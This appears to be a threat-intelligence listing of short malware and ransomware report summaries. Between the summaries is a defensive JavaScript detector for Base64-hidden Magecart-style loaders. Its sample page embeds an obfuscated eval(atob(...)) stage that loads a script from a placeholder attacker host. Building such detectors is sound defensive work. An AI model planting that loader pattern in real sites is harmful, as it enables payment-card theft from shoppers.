LummaC2 is a new infostealer sold on the dark web and spread by a threat group that disguises it as illegal cracks and keygens. The campaign uses obfuscation, anti-sandbox checks, and C2 communications to exfiltrate data from targeted browsers and wallet apps. #Lu…
Tag: DARK WEB
MacStealer is a macOS stealer distributed via DMG that is controlled over Telegram, marking a new platform for stealer operations. It exfiltrates browser credentials, Keychain data, and files, sending stolen data via HTTP POST to a C2 and to Telegram channels/…
Trigona is a newly observed ransomware strain that security researchers first noted in October 2022 and that was highly active in December 2022, with at least 15 victims across multiple industries. The operation uses HTML Application ransom notes with embedded JavaScript con…
Fortinet’s FortiGuard Labs’ Ransomware Roundup highlights two notable variants, Sirattacker and ALC, detailing their execution methods, ransom notes, and observed activity, including Bitcoin wallet interactions associated with the Sirattacker actor. The report…
Publicly released PoC for CVE-2022-39952 in FortiNAC enables threat actors to perform arbitrary file writes and potentially deploy web shells on vulnerable systems. The article highlights exposed FortiNAC instances, affected versions, and urges timely patching…
Stealc is a copycat information stealer advertised by Plymouth, drawing on Vidar, Raccoon, Mars and Redline. Sekoia.io analyzes its features, C2 communications, infection chain, and ongoing development, noting its rapid uptake among cybercriminals. #Stealc #Vi…
SentinelLabs detected a cluster of virtualized .NET loaders, named MalVirt, distributed via malvertising to deliver Formbook/XLoader infostealer payloads. The loaders use KoiVM-based virtualization and anti-analysis techniques, rely on a Windows Process Explor…
INKY uncovered a widespread Southwest Airlines credential harvesting phishing campaign that uses newly created domains to lure victims via a fake survey and gift-card offer. The scam escalates from impersonation and enticing branding to a credential-harvesting…
Resecurity identifies Nevada Ransomware as a relatively new ransomware family with an active affiliate platform on the RAMP underground. It operates a Windows and Linux/ESXi locker, supports post-exploitation workflows, and uses a TOR-based affiliate portal to…
Analyst1 presents a human-centric examination of the LockBit operation, tracing its evolution from ABCD to LockBit Red/Black and detailing the personalities, inter-gang dynamics, and operational innovations behind one of the world’s most prolific ransomware or…
The LCBO disclosed a cybersecurity incident in January 2023 involving a web skimmer designed to steal customer payment information from LCBO.com during checkout. Experts identified the skimmer as Magecart, loaded via a Base64-encoded Google Tag Manager snippet…
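The loader pattern named in the LCBO summary, a Base64 blob hidden inside a Google Tag Manager-looking inline script and decoded at runtime, is easy to hunt for in page source. The following is an added example, not code from the LCBO disclosure or from the researchers who analysed the skimmer: it pulls every inline script out of an HTML document, decodes any long Base64 literal that yields printable text, and flags decoded text that looks like a remote script loader. The sample page, the placeholder host `skimmer.example.invalid` and the loader stage are all constructed for the example and are not indicators from the article.

```javascript
// Added example (not from the LCBO write-up): hunt for a Base64-wrapped
// script loader inside an inline <script> dressed up as a GTM snippet.
// All sample markup below is constructed; the host name is a placeholder.

// Strings we expect in a decoded loader stage, not in ordinary tag text.
const LOADER_MARKERS = [
  /createElement\(\s*['"]script['"]\s*\)/, // builds a <script> element
  /\.src\s*=\s*['"]https?:\/\//,           // points it at a remote host
  /appendChild\(|insertBefore\(/,          // injects it into the DOM
];

// Pull the body of every inline <script> out of a page.
function extractInlineScripts(html) {
  const scripts = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (m[1].trim()) scripts.push(m[1].trim());
  }
  return scripts;
}

// Quoted Base64-looking literals of at least minLen characters.
function base64Literals(script, minLen = 40) {
  const re = new RegExp(`['"]([A-Za-z0-9+/]{${minLen},}={0,2})['"]`, 'g');
  const lits = [];
  let m;
  while ((m = re.exec(script)) !== null) lits.push(m[1]);
  return lits;
}

// Decode a literal and return printable ASCII text, or null when the literal
// is not valid Base64 or decodes to binary (images, fonts, hashes).
function decodeBase64Ascii(lit) {
  const buf = Buffer.from(lit, 'base64');
  const roundTrip = buf.toString('base64').replace(/=+$/, '');
  if (roundTrip !== lit.replace(/=+$/, '')) return null;
  const text = buf.toString('latin1');
  return /^[\t\n\r\x20-\x7e]+$/.test(text) ? text : null;
}

// Report every inline script whose embedded Base64 decodes to loader code.
// Two or more markers are required so a lone URL in a blob is not enough.
function findSuspiciousLoaders(html) {
  const hits = [];
  extractInlineScripts(html).forEach((script, index) => {
    const usesAtob = /\batob\s*\(/.test(script);
    for (const lit of base64Literals(script)) {
      const decoded = decodeBase64Ascii(lit);
      if (decoded === null) continue;
      const markers = LOADER_MARKERS.filter((r) => r.test(decoded));
      if (markers.length >= 2) {
        hits.push({ scriptIndex: index, usesAtob, decoded, markerCount: markers.length });
      }
    }
  });
  return hits;
}

// Constructed sample page: a genuine-looking GTM snippet, a harmless Base64
// blob, and a skimmer-style loader hidden behind atob().
const LOADER_STAGE =
  "var s=document.createElement('script');" +
  "s.src='https://skimmer.example.invalid/gtm.js';" +
  "document.head.appendChild(s);";
const HARMLESS_BLOB = Buffer.from('Store hours: Mon-Sat 10:00-21:00, Sun 11:00-18:00').toString('base64');
const SAMPLE_HTML = `
<html><head>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-XXXXXX');</script>
<script>window.__hours='${HARMLESS_BLOB}';</script>
<script>/* Google Tag Manager */(function(){eval(atob('${Buffer.from(LOADER_STAGE).toString('base64')}'));})();</script>
</head><body></body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(findSuspiciousLoaders(SAMPLE_HTML), null, 2));
}
```

Run it with Node against saved page source (replace `SAMPLE_HTML` with the file contents) to get a list of inline scripts whose Base64 payload builds and injects a remote script. Real GTM snippets carry no long Base64 literal, so a snippet that does, especially one that also calls `atob`, deserves a look; the decoded text is returned so the analyst can read the second stage directly.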
The article surveys how major dark web drug markets have become a multi-hundred-million-dollar ecosystem, with a shift toward mobile apps and instant messaging for buying, selling, and coordinating deliveries. It highlights ongoing wars for market share (Hydra…
CRIL researchers uncovered LummaC2 Stealer, a 32-bit GUI malware targeting Chromium and Mozilla browsers to exfiltrate crypto wallets, browser extensions, and 2FA data. The campaign includes a Russian-language seller site, Telegram channels, and active C2 serv…
CRIL uncovers Alibaba2044’s PureLogs stealer and related PureCoder malware offerings being sold in darkweb forums, with a December 14, 2022 spam campaign targeting Italian users. The piece details multiple tools (PureLogs, PureCrypter, PureMiner, BlueLoader, P…
CYFIRMA tracks three campaigns—Evian, UNC064, and Siberian bear—believed to be operated by Russian-speaking threat groups on behalf of their Russian masters, targeting various industries and geographies for espionage, financial gains, and reconnaissance. The r…